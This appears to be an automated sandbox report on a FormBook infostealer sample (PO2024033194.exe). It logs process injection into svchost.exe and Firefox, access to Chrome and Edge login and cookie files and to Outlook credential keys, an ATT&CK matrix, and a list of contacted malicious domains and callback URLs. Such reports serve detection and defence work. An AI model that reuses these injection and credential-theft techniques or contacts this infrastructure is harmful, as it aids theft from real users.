            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 6080Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO2024033194.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 431008Jump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\PO2024033194.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2024033194.exe"Jump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: PO2024033194.exe, drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: PO2024033194.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO2024033194.exeBinary or memory string: WIN_XP
            Source: PO2024033194.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: PO2024033194.exeBinary or memory string: WIN_XPe
            Source: PO2024033194.exeBinary or memory string: WIN_VISTA
            Source: PO2024033194.exeBinary or memory string: WIN_7
            Source: PO2024033194.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515416 Sample: PO2024033194.exe Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 31 www.sterkus.xyz 2->31 33 www.rtpngk.xyz 2->33 35 25 other IPs or domains 2->35 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 47 3 other signatures 2->47 10 PO2024033194.exe 1 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 61 Switches to a custom stack to bypass stack traces 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Maps a DLL or memory area into another process 13->63 16 drBzjAnGBElC.exe 13->16 injected process8 dnsIp9 25 www.sterkus.xyz 209.74.95.29, 49735, 49736, 49737 MULTIBAND-NEWHOPEUS United States 16->25 27 www.moritynomxd.xyz 172.81.61.224, 49718, 49787, 80 ESITEDUS United States 16->27 29 11 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 replace.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO2024033194.exe68%ReversingLabsWin32.Trojan.Autoitinject
            PO2024033194.exe100%AviraHEUR/AGEN.1321685
            PO2024033194.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://reg.ru0%Avira URL Cloudsafe
            http://www.deefbank.net0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
            http://www.warriorsyndrome.net/kzas/0%Avira URL Cloudsafe
            http://www.tracy.club/fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL0%Avira URL Cloudsafe
            https://htmlcodex.com0%Avira URL Cloudsafe
            http://156.226.108.98:58888/0%Avira URL Cloudsafe
            http://www.moritynomxd.xyz/v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA=0%Avira URL Cloudsafe
            http://www.wcq24.top/i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0=0%Avira URL Cloudsafe
            http://www.ks1x7i.vip/uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI=0%Avira URL Cloudsafe
            http://www.pakmartcentral.shop/ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKL0%Avira URL Cloudsafe
            http://www.cc101.pro/4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKL0%Avira URL Cloudsafe
            http://www.ks1x7i.vip/uxh9/0%Avira URL Cloudsafe
            http://www.warriorsyndrome.net/kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL0%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la0%Avira URL Cloudsafe
            http://www.sppsuperplast.online/becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM=0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            http://www.galaxyslot88rtp.lat/lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk=0%Avira URL Cloudsafe
            http://www.galaxyslot88rtp.lat/lbpf/0%Avira URL Cloudsafe
            http://www.les-massage.online/74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKL0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la0%Avira URL Cloudsafe
            http://www.rtpngk.xyz/876i/0%Avira URL Cloudsafe
            https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULp0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.tracy.club/fl4z/0%Avira URL Cloudsafe
            http://www.wcq24.top/i557/0%Avira URL Cloudsafe
            http://www.sterkus.xyz/ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL0%Avira URL Cloudsafe
            http://www.asociacia.online/bf6k/0%Avira URL Cloudsafe
            http://www.pakmartcentral.shop/ml5l/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css0%Avira URL Cloudsafe
            http://www.kovallo.cloud/kmgk/0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            https://code.jquery.com/jquery-3.4.1.min.js0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            http://www.sppsuperplast.online/becc/0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap-icons0%Avira URL Cloudsafe
            http://www.sterkus.xyz/ha8h/0%Avira URL Cloudsafe
            http://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL0%Avira URL Cloudsafe
            http://www.deefbank.net/1y6y/0%Avira URL Cloudsafe
            https://t.me/AG099990%Avira URL Cloudsafe
            http://www.syncnodex.net/xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u0%Avira URL Cloudsafe
            http://www.syncnodex.net/xx1z/0%Avira URL Cloudsafe
            http://www.kovallo.cloud/kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL0%Avira URL Cloudsafe
            http://www.asociacia.online/bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL0%Avira URL Cloudsafe
            https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw0%Avira URL Cloudsafe
            http://www.cc101.pro/4hfb/0%Avira URL Cloudsafe
            https://htmlcodex.com/credit-removal0%Avira URL Cloudsafe
            http://www.les-massage.online/74ou/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            pakmartcentral.shop
            		84.32.84.32
            		truefalse
              		unknown
              tracy.club
              		3.33.130.190
              		truefalse
                		unknown
                warriorsyndrome.net
                		3.33.130.190
                		truefalse
                  		unknown
                  wcq24.top
                  		154.23.184.240
                  		truefalse
                    		unknown
                    asociacia.online
                    		81.2.196.19
                    		truefalse
                      		unknown
                      www.moritynomxd.xyz
                      		172.81.61.224
                      		truetrue
                        		unknown
                        www.syncnodex.net
                        		15.197.172.60
                        		truefalse
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truefalse
                            		unknown
                            www.sterkus.xyz
                            		209.74.95.29
                            		truetrue
                              		unknown
                              www.cc101.pro
                              		188.114.97.3
                              		truefalse
                                		unknown
                                galaxyslot88rtp.lat
                                		46.17.172.49
